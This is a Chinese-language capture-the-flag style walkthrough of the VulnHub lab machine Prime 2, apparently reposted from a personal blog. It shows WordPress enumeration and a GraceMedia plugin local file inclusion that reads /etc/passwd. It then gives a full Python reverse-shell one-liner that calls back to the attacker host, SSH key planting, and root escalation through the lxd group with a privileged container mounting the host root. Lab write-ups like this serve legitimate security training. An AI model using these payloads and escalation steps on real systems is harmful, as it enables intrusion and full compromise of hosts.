[渗透测试学习靶机07] vulnhub靶场 Prime 2-Toy模板网

这篇具有很好参考价值的文章主要介绍了[渗透测试学习靶机07] vulnhub靶场 Prime 2。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

Kali的IP地址：192.168.127.139

靶机的IP地址：192.168.127.145

一、信息搜集

二、漏洞挖掘

三、漏洞利用

四、提权

总结：

Prime 2这个靶机我看网上很少有人通关打靶练习，自己尝试做了一下，感觉整体难度：比较难，大家可以参考一下。

一、信息搜集

1.1、扫描主机IP

[渗透测试学习靶机07] vulnhub靶场 Prime 2

1.2、扫描端口

[渗透测试学习靶机07] vulnhub靶场 Prime 2

发现开放了22（ssh）、80（http）、139、445、10123（使用python搭建的http）等端口

1.3、访问端口

先访问80端口，发现就是一个正常的页面

[渗透测试学习靶机07] vulnhub靶场 Prime 2

之后在访问10123端口，发现应该是某个用户的家目录

[渗透测试学习靶机07] vulnhub靶场 Prime 2

我们将所有文件下载下来进行查看

先创建一个文件夹，把所有下载的文件放在文件夹里

[渗透测试学习靶机07] vulnhub靶场 Prime 2

在这里我就下载了几个文件，因为其他文件名字有点怪，我在something文件中发下一些提示，也没啥东西

[渗透测试学习靶机07] vulnhub靶场 Prime 2

1.4、扫描目录

通过目录扫描发现一个wordpress的站点和一个server目录

[渗透测试学习靶机07] vulnhub靶场 Prime 2

我们先查看server目录，下载server目录下的文件，解压后发现是一套网站的源码，没有什么作用

[渗透测试学习靶机07] vulnhub靶场 Prime 2

我们接着查看wp站点，就是一个普通的页面。

[渗透测试学习靶机07] vulnhub靶场 Prime 2

二、漏洞挖掘

猜想一下肯定其他地方有漏洞，我们使用wpscan进行扫描，试一下

第一次使用WPScan软件的时候需要更新，但是更新会报错，这个时候看我另外一篇文章，也是做这个靶机的时候整理的

链接：Wpscan更新报错的问题，以及使用

扫描命令：

wpscan --url http://192.168.127.145/wp/ --enumerate

[渗透测试学习靶机07] vulnhub靶场 Prime 2

我们得到一个用户名：admin

接着在使用wpscan api-token后再次进行扫描发现存在一个LFI漏洞（文件包含漏洞）

扫描命令：

wpscan --url http://192.168.127.145/wp/ -e --api-token CPW3*********************************ZkfaXk

[渗透测试学习靶机07] vulnhub靶场 Prime 2

三、漏洞利用

（利用以上的方式拿到 webshell，或者其他权限）

如上图所示，在画箭头的地方有一个网址：Full Disclosure: WordPress Plugin GraceMedia Media Player 1.0 - Local FileInclusion

在Full Disclosure: WordPress Plugin GraceMedia Media Player 1.0 - Local FileInclusion可以看到文件包含漏洞过程

[渗透测试学习靶机07] vulnhub靶场 Prime 2

接着我们查看一下passwd


view-source:http://192.168.127.145/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

[渗透测试学习靶机07] vulnhub靶场 Prime 2

接着进行Webshell 反弹

http://192.168.127.145/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.127.139",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

[渗透测试学习靶机07] vulnhub靶场 Prime 2

然后我们使用python获取一个交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

[渗透测试学习靶机07] vulnhub靶场 Prime 2

并在/var/www/html/wp的目录下发现数据库的密码：root

[渗透测试学习靶机07] vulnhub靶场 Prime 2

于是用 enum4linux进行扫描，获得一个shell

enum4linux -a 192.168.127.145

[渗透测试学习靶机07] vulnhub靶场 Prime 2

接着我们使用smbclient进行连接

smbclient  //192.168.127.145/welcome

密码为：root

[渗透测试学习靶机07] vulnhub靶场 Prime 2

紧接着我们创建ssh公钥,用ssh-keygen

 ssh-keygen -b 2048

[渗透测试学习靶机07] vulnhub靶场 Prime 2

将id_rsa.pub复制到tmp目录下命名位authorized_keys

[渗透测试学习靶机07] vulnhub靶场 Prime 2

将authorized_keys上传到目标主机的.ssh目录下

[渗透测试学习靶机07] vulnhub靶场 Prime 2

然后使用ssh登录到目标主机

[渗透测试学习靶机07] vulnhub靶场 Prime 2

查看用户id发现jarves还属于lxd组

[渗透测试学习靶机07] vulnhub靶场 Prime 2

首先我们从github下载构建好的Alpine,然后进行执行

git clone  https://github.com/saghul/lxd-alpine-builder.git

cd lxd-alpine-builder

./build-alpine

[渗透测试学习靶机07] vulnhub靶场 Prime 2

四、提权

接着我们将生成的文件上传至目标机器


wget http://192.168.127.139:8889/alpine-v3.16-x86_64-20221016_1724.tar.gz

[渗透测试学习靶机07] vulnhub靶场 Prime 2

接着我们使用lxd进行初始化


lxd init

[渗透测试学习靶机07] vulnhub靶场 Prime 2

然后导入镜像

 lxc image import ./alpine-v3.16-x86_64-20221016_1724.tar.gz --alias myimage

[渗透测试学习靶机07] vulnhub靶场 Prime 2

查看镜像

lxc image list

[渗透测试学习靶机07] vulnhub靶场 Prime 2

进入到容器的命令行

lxc init myimage ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

[渗透测试学习靶机07] vulnhub靶场 Prime 2